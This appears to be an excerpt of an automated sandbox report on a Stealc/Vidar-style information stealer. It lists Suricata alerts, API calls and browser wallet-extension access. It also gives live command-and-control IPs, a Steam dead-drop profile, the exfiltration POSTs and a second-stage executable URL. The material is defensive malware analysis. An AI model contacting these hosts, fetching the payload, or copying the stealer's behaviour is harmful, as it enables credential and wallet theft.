Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A0B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	3_2_02A0CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A15142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

3_2_02A15142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]		3_2_02A014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax		3_2_02A014AD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.9:49714 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.9:49715
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.9:49716

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199780418869

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 49.12.197.9 49.12.197.9
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View	IP Address: 147.45.44.104 147.45.44.104

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49715 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49718 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49713 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49712 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49714 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49717 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49716 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49721 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49722 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49719 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49720 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49723 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49724 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49725 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49727 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49726 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49731 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49732 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49733 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49734 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49735 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49729 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49730 -> 49.12.197.9:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 6897Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 131345Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

3_2_02A05237

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache

Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp

Source: global traffic

DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe1kkkk
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exeJ5
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exetion:
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: file.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, file.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: file.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
